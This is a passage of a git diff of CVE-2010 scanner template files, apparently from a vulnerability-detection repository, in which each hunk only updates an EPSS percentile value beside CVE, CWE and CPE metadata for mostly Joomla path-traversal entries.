a/http/cves/2010/CVE-2010-1313.yaml +++ b/http/cves/2010/CVE-2010-1313.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1313 cwe-id: CWE-22 epss-score: 0.0045 - epss-percentile: 0.72258 + epss-percentile: 0.72402 cpe: cpe:2.3:a:seber:com_sebercart:1.0.0.12:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1314.yaml b/http/cves/2010/CVE-2010-1314.yaml index 6b7a0166ed..c424f0dabc 100644 --- a/http/cves/2010/CVE-2010-1314.yaml +++ b/http/cves/2010/CVE-2010-1314.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1314 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.73018 + epss-percentile: 0.73149 cpe: cpe:2.3:a:joomlanook:com_hsconfig:1.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1315.yaml b/http/cves/2010/CVE-2010-1315.yaml index 263ae97d41..a58b8ab704 100644 --- a/http/cves/2010/CVE-2010-1315.yaml +++ b/http/cves/2010/CVE-2010-1315.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1315 cwe-id: CWE-22 epss-score: 0.0087 - epss-percentile: 0.80459 + epss-percentile: 0.80553 cpe: cpe:2.3:a:joomlamo:com_weberpcustomer:1.2.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1340.yaml b/http/cves/2010/CVE-2010-1340.yaml index bc54569366..23ebbe1a46 100644 --- a/http/cves/2010/CVE-2010-1340.yaml +++ b/http/cves/2010/CVE-2010-1340.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1340 cwe-id: CWE-22 epss-score: 0.01155 - epss-percentile: 0.83193 + epss-percentile: 0.83281 cpe: cpe:2.3:a:joomla-research:com_jresearch:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1345.yaml b/http/cves/2010/CVE-2010-1345.yaml index 50c58cc2fc..e63459402e 100644 --- a/http/cves/2010/CVE-2010-1345.yaml +++ b/http/cves/2010/CVE-2010-1345.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1345 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.73018 + epss-percentile: 0.73149 cpe: cpe:2.3:a:cookex:com_ckforms:1.3.3:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1352.yaml b/http/cves/2010/CVE-2010-1352.yaml index 450a69d822..7eb233afcf 100644 --- a/http/cves/2010/CVE-2010-1352.yaml +++ b/http/cves/2010/CVE-2010-1352.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1352 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.73018 + epss-percentile: 0.73149 cpe: cpe:2.3:a:jooforge:com_jukebox:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1353.yaml b/http/cves/2010/CVE-2010-1353.yaml index caaaf7e905..d261375c8c 100644 --- a/http/cves/2010/CVE-2010-1353.yaml +++ b/http/cves/2010/CVE-2010-1353.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1353 cwe-id: CWE-22 epss-score: 0.01751 - epss-percentile: 0.86557 + epss-percentile: 0.86604 cpe: cpe:2.3:a:wowjoomla:com_loginbox:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1354.yaml b/http/cves/2010/CVE-2010-1354.yaml index 9e17bd4159..9f0a81024d 100644 --- a/http/cves/2010/CVE-2010-1354.yaml +++ b/http/cves/2010/CVE-2010-1354.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1354 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.73018 + epss-percentile: 0.73149 cpe: cpe:2.3:a:ternaria:com_vjdeo:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1429.yaml b/http/cves/2010/CVE-2010-1429.yaml index 89fc3bed5a..f64d5e7985 100644 --- a/http/cves/2010/CVE-2010-1429.yaml +++ b/http/cves/2010/CVE-2010-1429.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2010-1429 cwe-id: CWE-264 epss-score: 0.00573 - epss-percentile: 0.75419 + epss-percentile: 0.7553 cpe: cpe:2.3:a:redhat:jboss_enterprise_application_platform:*:cp08:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2010/CVE-2010-1461.yaml b/http/cves/2010/CVE-2010-1461.yaml index a832f1351d..4e3b60db86 100644 --- a/http/cves/2010/CVE-2010-1461.yaml +++ b/http/cves/2010/CVE-2010-1461.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1461 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.73018 + epss-percentile: 0.73149 cpe: cpe:2.3:a:gogoritas:com_photobattle:1.0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1469.yaml b/http/cves/2010/CVE-2010-1469.yaml index f9902c7043..c4a29e5e43 100644 --- a/http/cves/2010/CVE-2010-1469.yaml +++ b/http/cves/2010/CVE-2010-1469.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1469 cwe-id: CWE-22 epss-score: 0.00813 - epss-percentile: 0.79798 + epss-percentile: 0.79885 cpe: cpe:2.3:a:ternaria:com_jprojectmanager:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1470.yaml b/http/cves/2010/CVE-2010-1470.yaml index 3dcaccf62e..b75444e08e 100644 --- a/http/cves/2010/CVE-2010-1470.yaml +++ b/http/cves/2010/CVE-2010-1470.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1470 cwe-id: CWE-22 epss-score: 0.04616 - epss-percentile: 0.91662 + epss-percentile: 0.91716 cpe: cpe:2.3:a:dev.pucit.edu.pk:com_webtv:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1471.yaml b/http/cves/2010/CVE-2010-1471.yaml index 9bb821bd3a..bf23d912a0 100644 --- a/http/cves/2010/CVE-2010-1471.yaml +++ b/http/cves/2010/CVE-2010-1471.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1471 cwe-id: CWE-22 epss-score: 0.05684 - epss-percentile: 0.92524 + epss-percentile: 0.92564 cpe: cpe:2.3:a:b-elektro:com_addressbook:1.5.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1472.yaml b/http/cves/2010/CVE-2010-1472.yaml index d62dd254c7..495c830e4f 100644 --- a/http/cves/2010/CVE-2010-1472.yaml +++ b/http/cves/2010/CVE-2010-1472.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1472 cwe-id: CWE-22 epss-score: 0.05684 - epss-percentile: 0.92524 + epss-percentile: 0.92564 cpe: cpe:2.3:a:kazulah:com_horoscope:1.5.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1473.yaml b/http/cves/2010/CVE-2010-1473.yaml index e41af7fe09..98c98d26e1 100644 --- a/http/cves/2010/CVE-2010-1473.yaml +++ b/http/cves/2010/CVE-2010-1473.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1473 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.79974 + epss-percentile: 0.80059 cpe: cpe:2.3:a:johnmccollum:com_advertising:0.25:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1474.yaml b/http/cves/2010/CVE-2010-1474.yaml index a14291eb9c..33c9b6b099 100644 --- a/http/cves/2010/CVE-2010-1474.yaml +++ b/http/cves/2010/CVE-2010-1474.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1474 cwe-id: CWE-22 epss-score: 0.01242 - epss-percentile: 0.83897 + epss-percentile: 0.83996 cpe: cpe:2.3:a:supachai_teasakul:com_sweetykeeper:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1475.yaml b/http/cves/2010/CVE-2010-1475.yaml index ff03ca3d3b..ef58fac757 100644 --- a/http/cves/2010/CVE-2010-1475.yaml +++ b/http/cves/2010/CVE-2010-1475.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1475 cwe-id: CWE-22 epss-score: 0.01242 - epss-percentile: 0.83897 + epss-percentile: 0.83996 cpe: cpe:2.3:a:ternaria:com_preventive:1.0.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1476.yaml b/http/cves/2010/CVE-2010-1476.yaml index 814bae2adc..8e982c8d2b 100644 --- a/http/cves/2010/CVE-2010-1476.yaml +++ b/http/cves/2010/CVE-2010-1476.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1476 cwe-id: CWE-22 epss-score: 0.03527 - epss-percentile: 0.90562 + epss-percentile: 0.90637 cpe: cpe:2.3:a:alphaplug:com_alphauserpoints:1.5.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1478.yaml b/http/cves/2010/CVE-2010-1478.yaml index 0aff8845de..61bdd874c1 100644 --- a/http/cves/2010/CVE-2010-1478.yaml +++ b/http/cves/2010/CVE-2010-1478.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1478 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.79974 + epss-percentile: 0.80059 cpe: cpe:2.3:a:ternaria:com_jfeedback:1.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1491.yaml b/http/cves/2010/CVE-2010-1491.yaml index 7ee62cea87..ba43ae0d1f 100644 --- a/http/cves/2010/CVE-2010-1491.yaml +++ b/http/cves/2010/CVE-2010-1491.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1491 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.73018 + epss-percentile: 0.73149 cpe: cpe:2.3:a:mms.pipp:com_mmsblog:2.3.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1494.yaml b/http/cves/2010/CVE-2010-1494.yaml index c8ed5a3eba..f811dd7200 100644 --- a/http/cves/2010/CVE-2010-1494.yaml +++ b/http/cves/2010/CVE-2010-1494.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1494 cwe-id: CWE-22 epss-score: 0.01827 - epss-percentile: 0.86852 + epss-percentile: 0.8689 cpe: cpe:2.3:a:awdsolution:com_awdwall:1.5.4:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1495.yaml b/http/cves/2010/CVE-2010-1495.yaml index 94e5906378..2da0c2f532 100644 --- a/http/cves/2010/CVE-2010-1495.yaml +++ b/http/cves/2010/CVE-2010-1495.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1495 cwe-id: CWE-22 epss-score: 0.04503 - epss-percentile: 0.91565 + epss-percentile: 0.91627 cpe: cpe:2.3:a:matamko:com_matamko:1.01:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1531.yaml b/http/cves/2010/CVE-2010-1531.yaml index fbed245fbe..8cf06ac17f 100644 --- a/http/cves/2010/CVE-2010-1531.yaml +++ b/http/cves/2010/CVE-2010-1531.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1531 cwe-id: CWE-22 epss-score: 0.01815 - epss-percentile: 0.86795 + epss-percentile: 0.86834 cpe: cpe:2.3:a:redcomponent:com_redshop:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1532.yaml b/http/cves/2010/CVE-2010-1532.yaml index bbfb68b5b6..5e346d56a0 100644 --- a/http/cves/2010/CVE-2010-1532.yaml +++ b/http/cves/2010/CVE-2010-1532.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1532 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.73018 + epss-percentile: 0.73149 cpe: cpe:2.3:a:givesight:com_powermail:1.53:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1533.yaml b/http/cves/2010/CVE-2010-1533.yaml index 48855c5b76..d66a1f0620 100644 --- a/http/cves/2010/CVE-2010-1533.yaml +++ b/http/cves/2010/CVE-2010-1533.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1533 cwe-id: CWE-22 epss-score: 0.00706 - epss-percentile: 0.78131 + epss-percentile: 0.78254 cpe: cpe:2.3:a:peter_hocherl:com_tweetla:1.0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1534.yaml b/http/cves/2010/CVE-2010-1534.yaml index b6947cdc5a..47849bd9cf 100644 --- a/http/cves/2010/CVE-2010-1534.yaml +++ b/http/cves/2010/CVE-2010-1534.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1534 cwe-id: CWE-22 epss-score: 0.01228 - epss-percentile: 0.83763 + epss-percentile: 0.83874 cpe: cpe:2.3:a:joomla.batjo:com_shoutbox:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1535.yaml b/http/cves/2010/CVE-2010-1535.yaml index 34368ce661..dc0a05e8c6 100644 --- a/http/cves/2010/CVE-2010-1535.yaml +++ b/http/cves/2010/CVE-2010-1535.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1535 cwe-id: CWE-22 epss-score: 0.00706 - epss-percentile: 0.78131 + epss-percentile: 0.78254 cpe: cpe:2.3:a:peter_hocherl:com_travelbook:1.0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1540.yaml b/http/cves/2010/CVE-2010-1540.yaml index 4b8bb4fcc0..99962512d2 100644 --- a/http/cves/2010/CVE-2010-1540.yaml +++ b/http/cves/2010/CVE-2010-1540.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1540 cwe-id: CWE-22 epss-score: 0.0045 - epss-percentile: 0.72258 + epss-percentile: 0.72402 cpe: cpe:2.3:a:myblog:com_myblog:3.0.329:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1586.yaml b/http/cves/2010/CVE-2010-1586.yaml index 77b3cf12dc..b311595385 100644 --- a/http/cves/2010/CVE-2010-1586.yaml +++ b/http/cves/2010/CVE-2010-1586.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1586 cwe-id: CWE-20 epss-score: 0.00917 - epss-percentile: 0.81032 + epss-percentile: 0.81107 cpe: cpe:2.3:a:hp:system_management_homepage:2.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1601.yaml b/http/cves/2010/CVE-2010-1601.yaml index b816c6afbb..b20b8086d6 100644 --- a/http/cves/2010/CVE-2010-1601.yaml +++ b/http/cves/2010/CVE-2010-1601.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1601 cwe-id: CWE-22 epss-score: 0.01299 - epss-percentile: 0.843 + epss-percentile: 0.84392 cpe: cpe:2.3:a:joomlamart:com_jacomment:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1602.yaml b/http/cves/2010/CVE-2010-1602.yaml index 58616861ae..cd9a3e19e6 100644 --- a/http/cves/2010/CVE-2010-1602.yaml +++ b/http/cves/2010/CVE-2010-1602.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1602 cwe-id: CWE-22 epss-score: 0.03451 - epss-percentile: 0.90475 + epss-percentile: 0.90542 cpe: cpe:2.3:a:zimbllc:com_zimbcomment:0.8.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1603.yaml b/http/cves/2010/CVE-2010-1603.yaml index 35dedf0ded..81250b053c 100644 --- a/http/cves/2010/CVE-2010-1603.yaml +++ b/http/cves/2010/CVE-2010-1603.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1603 cwe-id: CWE-22 epss-score: 0.03451 - epss-percentile: 0.90475 + epss-percentile: 0.90542 cpe: cpe:2.3:a:zimbllc:com_zimbcore:0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1607.yaml b/http/cves/2010/CVE-2010-1607.yaml index 9c08e97b52..27184bb27e 100644 --- a/http/cves/2010/CVE-2010-1607.yaml +++ b/http/cves/2010/CVE-2010-1607.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1607 cwe-id: CWE-22 epss-score: 0.01726 - epss-percentile: 0.86459 + epss-percentile: 0.86501 cpe: cpe:2.3:a:paysyspro:com_wmi:1.5.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1653.yaml b/http/cves/2010/CVE-2010-1653.yaml index 58c66e492b..421e42ed89 100644 --- a/http/cves/2010/CVE-2010-1653.yaml +++ b/http/cves/2010/CVE-2010-1653.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1653 cwe-id: CWE-22 epss-score: 0.03527 - epss-percentile: 0.90562 + epss-percentile: 0.90637 cpe: cpe:2.3:a:htmlcoderhelper:com_graphics:1.0.6:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1657.yaml b/http/cves/2010/CVE-2010-1657.yaml index fc0062f4ee..09f7126d2c 100644 --- a/http/cves/2010/CVE-2010-1657.yaml +++ b/http/cves/2010/CVE-2010-1657.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1657 cwe-id: CWE-22 epss-score: 0.01751 - epss-percentile: 0.86557 + epss-percentile: 0.86604 cpe: cpe:2.3:a:recly:com_smartsite:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1658.yaml b/http/cves/2010/CVE-2010-1658.yaml index 1df114c744..90b416f391 100644 --- a/http/cves/2010/CVE-2010-1658.yaml +++ b/http/cves/2010/CVE-2010-1658.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1658 cwe-id: CWE-22 epss-score: 0.01751 - epss-percentile: 0.86557 + epss-percentile: 0.86604 cpe: cpe:2.3:a:code-garage:com_noticeboard:1.3:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1659.yaml b/http/cves/2010/CVE-2010-1659.yaml index 92ade001f1..412e46168a 100644 --- a/http/cves/2010/CVE-2010-1659.yaml +++ b/http/cves/2010/CVE-2010-1659.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2010-1659 cwe-id: CWE-22 epss-score: 0.01806 - epss-percentile: 0.86763 + epss-percentile: 0.86803 cpe: cpe:2.3:a:webkul:com_ultimateportfolio:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1714.yaml b/http/cves/2010/CVE-2010-1714.yaml index dcbb468c6a..2a68e9eed0 100644 --- a/http/cves/2010/CVE-2010-1714.yaml +++ b/http/cves/2010/CVE-2010-1714.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1714 cwe-id: CWE-22 epss-score: 0.01751 - epss-percentile: 0.86557 + epss-percentile: 0.86604 cpe: cpe:2.3:a:dev.pucit.edu.pk:com_arcadegames:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1715.yaml b/http/cves/2010/CVE-2010-1715.yaml index 13f85de33e..7d28e8e2dd 100644 --- a/http/cves/2010/CVE-2010-1715.yaml +++ b/http/cves/2010/CVE-2010-1715.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1715 cwe-id: CWE-22 epss-score: 0.01242 - epss-percentile: 0.83897 + epss-percentile: 0.83996 cpe: cpe:2.3:a:pucit.edu:com_onlineexam:1.5.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1717.yaml b/http/cves/2010/CVE-2010-1717.yaml index b7b8c9a375..53605832af 100644 --- a/http/cves/2010/CVE-2010-1717.yaml +++ b/http/cves/2010/CVE-2010-1717.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1717 cwe-id: CWE-22 epss-score: 0.01733 - epss-percentile: 0.86481 + epss-percentile: 0.86527 cpe: cpe:2.3:a:if_surfalert_project:if_surfalert:1.2:*:*:*:*:joomla\!:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1718.yaml b/http/cves/2010/CVE-2010-1718.yaml index 9d82704fb5..976873bb25 100644 --- a/http/cves/2010/CVE-2010-1718.yaml +++ b/http/cves/2010/CVE-2010-1718.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1718 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.79974 + epss-percentile: 0.80059 cpe: cpe:2.3:a:lispeltuut:com_archeryscores:1.0.6:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1719.yaml b/http/cves/2010/CVE-2010-1719.yaml index 0851ce5cd1..bbe13271fb 100644 --- a/http/cves/2010/CVE-2010-1719.yaml +++ b/http/cves/2010/CVE-2010-1719.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1719 cwe-id: CWE-22 epss-score: 0.01671 - epss-percentile: 0.86247 + epss-percentile: 0.86287 cpe: cpe:2.3:a:moto-treks:com_mtfireeagle:1.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1722.yaml b/http/cves/2010/CVE-2010-1722.yaml index 333a2aa3a5..15dd472bd1 100644 --- a/http/cves/2010/CVE-2010-1722.yaml +++ b/http/cves/2010/CVE-2010-1722.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1722 cwe-id: CWE-22 epss-score: 0.01242 - epss-percentile: 0.83897 + epss-percentile: 0.83996 cpe: cpe:2.3:a:dev.pucit.edu.pk:com_market:2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1723.yaml b/http/cves/2010/CVE-2010-1723.yaml index 3ff52be6ef..d1d622d487 100644 --- a/http/cves/2010/CVE-2010-1723.yaml +++ b/http/cves/2010/CVE-2010-1723.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1723 cwe-id: CWE-22 epss-score: 0.01956 - epss-percentile: 0.87395 + epss-percentile: 0.87449 cpe: cpe:2.3:a:joomlacomponent.inetlanka:com_drawroot:1.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1858.yaml b/http/cves/2010/CVE-2010-1858.yaml index 09c267dabe..f3a141c8f0 100644 --- a/http/cves/2010/CVE-2010-1858.yaml +++ b/http/cves/2010/CVE-2010-1858.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1858 cwe-id: CWE-22 epss-score: 0.01155 - epss-percentile: 0.83193 + epss-percentile: 0.83281 cpe: cpe:2.3:a:gelembjuk:com_smestorage:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1870.yaml b/http/cves/2010/CVE-2010-1870.yaml index 3bbf52e59f..e453442543 100644 --- a/http/cves/2010/CVE-2010-1870.yaml +++ b/http/cves/2010/CVE-2010-1870.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2010-1870 cwe-id: CWE-917 epss-score: 0.06174 - epss-percentile: 0.92785 + epss-percentile: 0.92842 cpe: cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2010/CVE-2010-1875.yaml b/http/cves/2010/CVE-2010-1875.yaml index 56261b336d..e515ff2ce3 100644 --- a/http/cves/2010/CVE-2010-1875.yaml +++ b/http/cves/2010/CVE-2010-1875.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1875 cwe-id: CWE-22 epss-score: 0.01222 - epss-percentile: 0.83729 + epss-percentile: 0.83839 cpe: cpe:2.3:a:com-property:com_properties:3.1.22-03:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1878.yaml b/http/cves/2010/CVE-2010-1878.yaml index 62426ab49f..61510a5d91 100644 --- a/http/cves/2010/CVE-2010-1878.yaml +++ b/http/cves/2010/CVE-2010-1878.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1878 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.79974 + epss-percentile: 0.80059 cpe: cpe:2.3:a:blueflyingfish.no-ip:com_orgchart:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1952.yaml b/http/cves/2010/CVE-2010-1952.yaml index 04edc067bb..668b7860bf 100644 --- a/http/cves/2010/CVE-2010-1952.yaml +++ b/http/cves/2010/CVE-2010-1952.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1952 cwe-id: CWE-22 epss-score: 0.01242 - epss-percentile: 0.83897 + epss-percentile: 0.83996 cpe: cpe:2.3:a:cmstactics:com_beeheard:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1953.yaml b/http/cves/2010/CVE-2010-1953.yaml index 8c32ba2958..961082d3c5 100644 --- a/http/cves/2010/CVE-2010-1953.yaml +++ b/http/cves/2010/CVE-2010-1953.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1953 cwe-id: CWE-22 epss-score: 0.05684 - epss-percentile: 0.92524 + epss-percentile: 0.92564 cpe: cpe:2.3:a:joomlacomponent.inetlanka:com_multimap:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1954.yaml b/http/cves/2010/CVE-2010-1954.yaml index 56407a3b7c..956b4aa108 100644 --- a/http/cves/2010/CVE-2010-1954.yaml +++ b/http/cves/2010/CVE-2010-1954.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1954 cwe-id: CWE-22 epss-score: 0.05684 - epss-percentile: 0.92524 + epss-percentile: 0.92564 cpe: cpe:2.3:a:joomlacomponent.inetlanka:com_multiroot:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1955.yaml b/http/cves/2010/CVE-2010-1955.yaml index 9eb526f467..e679521888 100644 --- a/http/cves/2010/CVE-2010-1955.yaml +++ b/http/cves/2010/CVE-2010-1955.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1955 cwe-id: CWE-22 epss-score: 0.01671 - epss-percentile: 0.86247 + epss-percentile: 0.86287 cpe: cpe:2.3:a:thefactory:com_blogfactory:1.1.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1956.yaml b/http/cves/2010/CVE-2010-1956.yaml index 1b512a94d8..66a9ec03df 100644 --- a/http/cves/2010/CVE-2010-1956.yaml +++ b/http/cves/2010/CVE-2010-1956.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1956 cwe-id: CWE-22 epss-score: 0.06055 - epss-percentile: 0.92722 + epss-percentile: 0.92761 cpe: cpe:2.3:a:thefactory:com_gadgetfactory:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1957.yaml b/http/cves/2010/CVE-2010-1957.yaml index 0a9bca3a17..f1226ad515 100644 --- a/http/cves/2010/CVE-2010-1957.yaml +++ b/http/cves/2010/CVE-2010-1957.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1957 cwe-id: CWE-22 epss-score: 0.01671 - epss-percentile: 0.86247 + epss-percentile: 0.86287 cpe: cpe:2.3:a:thefactory:com_lovefactory:1.3.4:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1977.yaml b/http/cves/2010/CVE-2010-1977.yaml index 184d1cd462..b1d874c137 100644 --- a/http/cves/2010/CVE-2010-1977.yaml +++ b/http/cves/2010/CVE-2010-1977.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1977 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.79974 + epss-percentile: 0.80059 cpe: cpe:2.3:a:gohigheris:com_jwhmcs:1.5.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1979.yaml b/http/cves/2010/CVE-2010-1979.yaml index c2e68854c0..9e79581b55 100644 --- a/http/cves/2010/CVE-2010-1979.yaml +++ b/http/cves/2010/CVE-2010-1979.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1979 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.79974 + epss-percentile: 0.80059 cpe: cpe:2.3:a:affiliatefeeds:com_datafeeds:build_880:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1980.yaml b/http/cves/2010/CVE-2010-1980.yaml index 25c1b9eabf..4566707873 100644 --- a/http/cves/2010/CVE-2010-1980.yaml +++ b/http/cves/2010/CVE-2010-1980.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1980 cwe-id: CWE-22 epss-score: 0.02401 - epss-percentile: 0.88731 + epss-percentile: 0.88794 cpe: cpe:2.3:a:roberto_aloi:com_joomlaflickr:1.0.3:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1981.yaml b/http/cves/2010/CVE-2010-1981.yaml index ee53c321b2..d3016b53f9 100644 --- a/http/cves/2010/CVE-2010-1981.yaml +++ 